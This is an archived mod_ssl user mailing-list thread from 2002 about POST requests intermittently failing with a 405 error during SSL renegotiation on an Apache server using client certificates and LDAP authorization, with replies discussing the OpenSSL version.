>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 16:08:10 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D295A2AA084; Tue, 17 Dec 2002 16:08:10 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from GATE2.retail-sc.com (ns.rscweb.net [195.127.175.210])
	by master.modssl.org (Postfix) with ESMTP id 1A6752AA078
	for ; Tue, 17 Dec 2002 16:08:09 +0100 (CET)
Received: from mambox.intdus.retail-sc.com (IDENT:root@mambox.intdus.retail-sc.com [10.0.12.1])
	by GATE2.retail-sc.com (8.9.3/8.9.3) with ESMTP id QAA20761
	for ; Tue, 17 Dec 2002 16:07:26 +0100
Received: from mambox.intdus.retail-sc.com (IDENT:jpm@mambox.intdus.retail-sc.com [10.0.12.1])
	by mambox.intdus.retail-sc.com (8.9.1/8.9.1) with ESMTP id QAA10053;
	Tue, 17 Dec 2002 16:07:14 +0100
Date: Tue, 17 Dec 2002 16:07:14 +0100 (CET)
From: Jan-Piet Mens 
To: modssl-users@modssl.org
Subject: POST with mod_ssl intermittently fails with a 405
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-G2-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan-Piet Mens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I've got an self-built Apache on a RedHat 7.3 Linux box with Apache/2.0.43,
mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and mod_authzldap 0.22

Every so often a PHP page is called with a POST request to send data to the
server. The whole server area is protected via the following settings in
ssl.conf:


        Options Indexes FollowSymLinks ExecCGI
        DirectoryIndex index.php index.cgi
        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars StrictRequire StdEnvVars OptRenegotiate

        SSLRequireSSL
        SSLVerifyClient require
        SSLVerifyDepth  4
        SSLRequire     ( \
                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
                %{SSL_CLIENT_I_DN_CN} eq "my CA" )

        AuthzLDAPEngine                 on
        AuthzLDAPAuthoritative          on
        AuthzLDAPServer                 localhost:389
        AuthzLDAPBindDN                 "cn=manager,dc=mydomain,dc=com"
        AuthzLDAPBindPassword           "terriblysecret"
        AuthzLDAPUseCertificate         on
        AuthzLDAPSetAuthorization       on
        AuthzLDAPUseSerial              on
        AuthzLDAPMapBase                ou=AuthzLDAPCertmap,dc=mydomain,dc=com
        AuthzLDAPMapScope               subtree
        AuthzLDAPLogLevel               warn
        AuthzLDAPCacheConnection        off
        AuthzLDAPCacheSize              0
        AuthName                        AuthzLDAP
        AuthType                        Basic


and with the following require in .htaccess of the same directory:

	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"

GET operations always work perfectly (BTW almost all resources are .PHP).
Once in a while a POST method is attempted which then sometimes fails (not
always). When it has failed, subsequent GET methods on different pages do
not work either. After a certain time which always differs, the GET will work
and the following POST also.

I've tried changing SSLSessionCache to `shm' and SSLMutex to `sem' thinking
it had something to do with it, but to no avail. The value of SSLSessionCacheTimeout
doesn't seem to matter either.

At the time of the failure, the logs have this in them:

error_log:
	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43 (Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured -- resuming normal operations
	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation in conjunction with POST method not supported!
	hint: try SSLOptions +OptRenegotiate

access_log:
	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST /ca/ra/upd.php HTTP/1.1" 405 312
	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET /ca/ra/req.php HTTP/1.1" 403 292
	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com [17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php HTTP/1.1" 200 4936

ssl_request_log:
	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5 "POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"

The clients are a mixture of Mozilla 1.2 and Internet Explorer 6.0 all
with a client cert issued by my CA. The issue affects both clients (Netscape
4.5 shows the same)

Can someone help me resolve this, please ?

Thank you very much.
Regards,
	-JP

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 16:19:01 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2C5FE2AA084; Tue, 17 Dec 2002 16:19:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id C30452AA078
	for ; Tue, 17 Dec 2002 16:18:59 +0100 (CET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gBHFIu5V018158
	for ; Tue, 17 Dec 2002 16:18:56 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gBHFItDm016688
	for ; Tue, 17 Dec 2002 16:18:55 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: POST with mod_ssl intermittently fails with a 405
Date: Tue, 17 Dec 2002 16:18:55 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A626@SOMEXEVS001.ex.ordersx.org>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: POST with mod_ssl intermittently fails with a 405
Importance: normal
Thread-Index: AcKl3lDCeWqDhdZaR2C90tvwPTH3sgAARAuw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Your openSSL libs are a bit old - there have been many important code
updates since 0.9.6b. In particular, the most recent update (0.9.6h)
fixed race condition bugs that were causing intermittent failures. Try
an upgrade first, I would advise...

Rgds,

Owen Boyle

>-----Original Message-----
>From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
>Sent: Dienstag, 17. Dezember 2002 16:07
>To: modssl-users@modssl.org
>Subject: POST with mod_ssl intermittently fails with a 405
>
>
>Hello,
>
>I've got an self-built Apache on a RedHat 7.3 Linux box with 
>Apache/2.0.43,
>mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and mod_authzldap 0.22
>
>Every so often a PHP page is called with a POST request to 
>send data to the
>server. The whole server area is protected via the following 
>settings in
>ssl.conf:
>
>
>        Options Indexes FollowSymLinks ExecCGI
>        DirectoryIndex index.php index.cgi
>        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars 
>StrictRequire StdEnvVars OptRenegotiate
>
>        SSLRequireSSL
>        SSLVerifyClient require
>        SSLVerifyDepth  4
>        SSLRequire     ( \
>                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
>                %{SSL_CLIENT_I_DN_CN} eq "my CA" )
>
>        AuthzLDAPEngine                 on
>        AuthzLDAPAuthoritative          on
>        AuthzLDAPServer                 localhost:389
>        AuthzLDAPBindDN                 "cn=manager,dc=mydomain,dc=com"
>        AuthzLDAPBindPassword           "terriblysecret"
>        AuthzLDAPUseCertificate         on
>        AuthzLDAPSetAuthorization       on
>        AuthzLDAPUseSerial              on
>        AuthzLDAPMapBase                
>ou=AuthzLDAPCertmap,dc=mydomain,dc=com
>        AuthzLDAPMapScope               subtree
>        AuthzLDAPLogLevel               warn
>        AuthzLDAPCacheConnection        off
>        AuthzLDAPCacheSize              0
>        AuthName                        AuthzLDAP
>        AuthType                        Basic
>
>
>and with the following require in .htaccess of the same directory:
>
>	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"
>
>GET operations always work perfectly (BTW almost all resources 
>are .PHP).
>Once in a while a POST method is attempted which then 
>sometimes fails (not
>always). When it has failed, subsequent GET methods on 
>different pages do
>not work either. After a certain time which always differs, 
>the GET will work
>and the following POST also.
>
>I've tried changing SSLSessionCache to `shm' and SSLMutex to 
>`sem' thinking
>it had something to do with it, but to no avail. The value of 
>SSLSessionCacheTimeout
>doesn't seem to matter either.
>
>At the time of the failure, the logs have this in them:
>
>error_log:
>	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43 
>(Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured -- 
>resuming normal operations
>	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation 
>in conjunction with POST method not supported!
>	hint: try SSLOptions +OptRenegotiate
>
>access_log:
>	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST 
>/ca/ra/upd.php HTTP/1.1" 405 312
>	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET 
>/ca/ra/req.php HTTP/1.1" 403 292
>	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com 
>[17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php HTTP/1.1" 200 4936
>
>ssl_request_log:
>	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5 
>"POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"
>
>The clients are a mixture of Mozilla 1.2 and Internet Explorer 6.0 all
>with a client cert issued by my CA. The issue affects both 
>clients (Netscape
>4.5 shows the same)
>
>Can someone help me resolve this, please ?
>
>Thank you very much.
>Regards,
>	-JP
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 16:25:51 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EEED22AA084; Tue, 17 Dec 2002 16:25:50 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id C622B2AA078
	for ; Tue, 17 Dec 2002 16:25:49 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gBHFQmd23150
	for ; Tue, 17 Dec 2002 15:27:09 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 17 Dec 2002 15:25:10 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F24C2@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
Date: Tue, 17 Dec 2002 15:25:06 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry to correct you Owen, (you are usually spot on), but RedHat 7.x/8.0
will all show openssl 0.9.6b. Provided that the machine is up to date (eg
using Red Hat Network at https://rhn.redhat.com) it will have all the
updates.

And no, I'm not on commission...

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

"I know it sounds cocky, but I honestly believe that one day there'll be a
telephone in every Town in America" - Alexander Graham Bell


> -----Original Message-----
> From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> Sent: 17 December 2002 15:19
> To: modssl-users@modssl.org
> Subject: RE: POST with mod_ssl intermittently fails with a 405
> 
> 
> Your openSSL libs are a bit old - there have been many important code
> updates since 0.9.6b. In particular, the most recent update (0.9.6h)
> fixed race condition bugs that were causing intermittent failures. Try
> an upgrade first, I would advise...
> 
> Rgds,
> 
> Owen Boyle
> 
> >-----Original Message-----
> >From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> >Sent: Dienstag, 17. Dezember 2002 16:07
> >To: modssl-users@modssl.org
> >Subject: POST with mod_ssl intermittently fails with a 405
> >
> >
> >Hello,
> >
> >I've got an self-built Apache on a RedHat 7.3 Linux box with 
> >Apache/2.0.43,
> >mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and mod_authzldap 0.22
> >
> >Every so often a PHP page is called with a POST request to 
> >send data to the
> >server. The whole server area is protected via the following 
> >settings in
> >ssl.conf:
> >
> >
> >        Options Indexes FollowSymLinks ExecCGI
> >        DirectoryIndex index.php index.cgi
> >        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars 
> >StrictRequire StdEnvVars OptRenegotiate
> >
> >        SSLRequireSSL
> >        SSLVerifyClient require
> >        SSLVerifyDepth  4
> >        SSLRequire     ( \
> >                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
> >                %{SSL_CLIENT_I_DN_CN} eq "my CA" )
> >
> >        AuthzLDAPEngine                 on
> >        AuthzLDAPAuthoritative          on
> >        AuthzLDAPServer                 localhost:389
> >        AuthzLDAPBindDN                 
> "cn=manager,dc=mydomain,dc=com"
> >        AuthzLDAPBindPassword           "terriblysecret"
> >        AuthzLDAPUseCertificate         on
> >        AuthzLDAPSetAuthorization       on
> >        AuthzLDAPUseSerial              on
> >        AuthzLDAPMapBase                
> >ou=AuthzLDAPCertmap,dc=mydomain,dc=com
> >        AuthzLDAPMapScope               subtree
> >        AuthzLDAPLogLevel               warn
> >        AuthzLDAPCacheConnection        off
> >        AuthzLDAPCacheSize              0
> >        AuthName                        AuthzLDAP
> >        AuthType                        Basic
> >
> >
> >and with the following require in .htaccess of the same directory:
> >
> >	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"
> >
> >GET operations always work perfectly (BTW almost all resources 
> >are .PHP).
> >Once in a while a POST method is attempted which then 
> >sometimes fails (not
> >always). When it has failed, subsequent GET methods on 
> >different pages do
> >not work either. After a certain time which always differs, 
> >the GET will work
> >and the following POST also.
> >
> >I've tried changing SSLSessionCache to `shm' and SSLMutex to 
> >`sem' thinking
> >it had something to do with it, but to no avail. The value of 
> >SSLSessionCacheTimeout
> >doesn't seem to matter either.
> >
> >At the time of the failure, the logs have this in them:
> >
> >error_log:
> >	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43 
> >(Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured -- 
> >resuming normal operations
> >	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation 
> >in conjunction with POST method not supported!
> >	hint: try SSLOptions +OptRenegotiate
> >
> >access_log:
> >	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST 
> >/ca/ra/upd.php HTTP/1.1" 405 312
> >	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET 
> >/ca/ra/req.php HTTP/1.1" 403 292
> >	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com 
> >[17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php HTTP/1.1" 200 4936
> >
> >ssl_request_log:
> >	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5 
> >"POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"
> >
> >The clients are a mixture of Mozilla 1.2 and Internet 
> Explorer 6.0 all
> >with a client cert issued by my CA. The issue affects both 
> >clients (Netscape
> >4.5 shows the same)
> >
> >Can someone help me resolve this, please ?
> >
> >Thank you very much.
> >Regards,
> >	-JP
> >
> >_____________________________________________________________
> _________
> >Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 16:34:17 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 57AA62AA084; Tue, 17 Dec 2002 16:34:17 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id A0E9B2AA078
	for ; Tue, 17 Dec 2002 16:34:15 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gBHFZXd23816
	for ; Tue, 17 Dec 2002 15:35:38 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 17 Dec 2002 15:33:55 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F24C4@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
Date: Tue, 17 Dec 2002 15:33:53 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've just re-read the original posters message, and it is possible that when
they say the system is "self-built" that they built an older version of
openssl. However, given what I've already said that is unlikely.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

"I know it sounds cocky, but I honestly believe that one day there'll be a
telephone in every Town in America" - Alexander Graham Bell


> -----Original Message-----
> From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> Sent: 17 December 2002 15:19
> To: modssl-users@modssl.org
> Subject: RE: POST with mod_ssl intermittently fails with a 405
> 
> 
> Your openSSL libs are a bit old - there have been many important code
> updates since 0.9.6b. In particular, the most recent update (0.9.6h)
> fixed race condition bugs that were causing intermittent failures. Try
> an upgrade first, I would advise...
> 
> Rgds,
> 
> Owen Boyle
> 
> >-----Original Message-----
> >From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> >Sent: Dienstag, 17. Dezember 2002 16:07
> >To: modssl-users@modssl.org
> >Subject: POST with mod_ssl intermittently fails with a 405
> >
> >
> >Hello,
> >
> >I've got an self-built Apache on a RedHat 7.3 Linux box with 
> >Apache/2.0.43,
> >mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and mod_authzldap 0.22
> >
> >Every so often a PHP page is called with a POST request to 
> >send data to the
> >server. The whole server area is protected via the following 
> >settings in
> >ssl.conf:
> >
> >
> >        Options Indexes FollowSymLinks ExecCGI
> >        DirectoryIndex index.php index.cgi
> >        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars 
> >StrictRequire StdEnvVars OptRenegotiate
> >
> >        SSLRequireSSL
> >        SSLVerifyClient require
> >        SSLVerifyDepth  4
> >        SSLRequire     ( \
> >                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
> >                %{SSL_CLIENT_I_DN_CN} eq "my CA" )
> >
> >        AuthzLDAPEngine                 on
> >        AuthzLDAPAuthoritative          on
> >        AuthzLDAPServer                 localhost:389
> >        AuthzLDAPBindDN                 
> "cn=manager,dc=mydomain,dc=com"
> >        AuthzLDAPBindPassword           "terriblysecret"
> >        AuthzLDAPUseCertificate         on
> >        AuthzLDAPSetAuthorization       on
> >        AuthzLDAPUseSerial              on
> >        AuthzLDAPMapBase                
> >ou=AuthzLDAPCertmap,dc=mydomain,dc=com
> >        AuthzLDAPMapScope               subtree
> >        AuthzLDAPLogLevel               warn
> >        AuthzLDAPCacheConnection        off
> >        AuthzLDAPCacheSize              0
> >        AuthName                        AuthzLDAP
> >        AuthType                        Basic
> >
> >
> >and with the following require in .htaccess of the same directory:
> >
> >	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"
> >
> >GET operations always work perfectly (BTW almost all resources 
> >are .PHP).
> >Once in a while a POST method is attempted which then 
> >sometimes fails (not
> >always). When it has failed, subsequent GET methods on 
> >different pages do
> >not work either. After a certain time which always differs, 
> >the GET will work
> >and the following POST also.
> >
> >I've tried changing SSLSessionCache to `shm' and SSLMutex to 
> >`sem' thinking
> >it had something to do with it, but to no avail. The value of 
> >SSLSessionCacheTimeout
> >doesn't seem to matter either.
> >
> >At the time of the failure, the logs have this in them:
> >
> >error_log:
> >	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43 
> >(Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured -- 
> >resuming normal operations
> >	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation 
> >in conjunction with POST method not supported!
> >	hint: try SSLOptions +OptRenegotiate
> >
> >access_log:
> >	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST 
> >/ca/ra/upd.php HTTP/1.1" 405 312
> >	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET 
> >/ca/ra/req.php HTTP/1.1" 403 292
> >	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com 
> >[17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php HTTP/1.1" 200 4936
> >
> >ssl_request_log:
> >	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5 
> >"POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"
> >
> >The clients are a mixture of Mozilla 1.2 and Internet 
> Explorer 6.0 all
> >with a client cert issued by my CA. The issue affects both 
> >clients (Netscape
> >4.5 shows the same)
> >
> >Can someone help me resolve this, please ?
> >
> >Thank you very much.
> >Regards,
> >	-JP
> >
> >_____________________________________________________________
> _________
> >Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 16:44:02 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F1E782AA084; Tue, 17 Dec 2002 16:44:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from GATE2.retail-sc.com (gate2.retail-sc.com [195.127.175.210])
	by master.modssl.org (Postfix) with ESMTP id 7A8952AA078
	for ; Tue, 17 Dec 2002 16:44:00 +0100 (CET)
Received: from mambox.intdus.retail-sc.com (IDENT:root@mambox.intdus.retail-sc.com [10.0.12.1])
	by GATE2.retail-sc.com (8.9.3/8.9.3) with ESMTP id QAA24387
	for ; Tue, 17 Dec 2002 16:41:51 +0100
Received: from mambox.intdus.retail-sc.com (IDENT:jpm@mambox.intdus.retail-sc.com [10.0.12.1])
	by mambox.intdus.retail-sc.com (8.9.1/8.9.1) with ESMTP id QAA14112
	for ; Tue, 17 Dec 2002 16:41:50 +0100
Date: Tue, 17 Dec 2002 16:41:50 +0100 (CET)
From: Jan-Piet Mens 
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F24C4@pborolocal.rnib.org.uk>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-G2-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan-Piet Mens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It is just Apache & PHP & mod_authzldap that are self-built (i.e. compiled).
The rest of the system is a vanilla RedHat 7.3.

	-JP


On Tue, 17 Dec 2002, John.Airey@rnib.org.uk wrote:

> I've just re-read the original posters message, and it is possible that when
> they say the system is "self-built" that they built an older version of
> openssl. However, given what I've already said that is unlikely.
>
> -
> John Airey, BSc (Jt Hons), CNA, RHCE
> Internet systems support officer, ITCSD, Royal National Institute of the
> Blind,
> Bakewell Road, Peterborough PE2 6XU,
> Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk
>
> "I know it sounds cocky, but I honestly believe that one day there'll be a
> telephone in every Town in America" - Alexander Graham Bell
>
>
> > -----Original Message-----
> > From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> > Sent: 17 December 2002 15:19
> > To: modssl-users@modssl.org
> > Subject: RE: POST with mod_ssl intermittently fails with a 405
> >
> >
> > Your openSSL libs are a bit old - there have been many important code
> > updates since 0.9.6b. In particular, the most recent update (0.9.6h)
> > fixed race condition bugs that were causing intermittent failures. Try
> > an upgrade first, I would advise...
> >
> > Rgds,
> >
> > Owen Boyle
> >
> > >-----Original Message-----
> > >From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> > >Sent: Dienstag, 17. Dezember 2002 16:07
> > >To: modssl-users@modssl.org
> > >Subject: POST with mod_ssl intermittently fails with a 405
> > >
> > >
> > >Hello,
> > >
